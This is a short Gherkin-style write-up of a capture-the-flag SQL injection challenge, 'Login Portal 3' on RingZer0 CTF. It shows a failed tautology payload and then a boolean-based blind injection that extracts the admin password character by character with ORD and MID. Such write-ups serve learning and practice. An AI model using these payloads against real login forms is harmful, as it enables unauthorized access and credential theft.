## Version 2.0
## language: en

Feature: login-portal-3-ringerzeroctf
  Site:
    https://ringzer0ctf.com/challenges/5
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://ringzer0ctf.com/challenges/5
    """
    When I open the url with Chrome
    Then I see a login form
  Scenario: Fail:Sql-injection
    Given the form
    And knowing that answer is correct when It returns:
    """
    FLAG-*********************
    """
    When I try with a well known payload
    """
    username=admin' or '1'='1&password=a
    """
    Then I get "Invalid username / password."
    And I don't solve the challenge

   Scenario: Success:Sqli-boolean-exploitation
    Given that I inspected the functionality
    And I see that they respond with "No user found."
    Then I figure out that I need the actual password
    When I use the following payload
    """
    username=a' or (ord(mid((select password from users limit 0,1),1,1))<128)
    and 'a'='a&password=a
    """
    And it responds different if I change the query
    Then I created the following payload to get the password
    """
    "a' or (ord(mid((select password from users limit 0,1)," + \
                  str(COUNT) + ",1))=" + str(i) + ") and 'a'='a"
    """
    Then I created a python script to find it using ORD and MID [exploit.py]
    And I get the admin password and the flag
    Then I solve the challenge
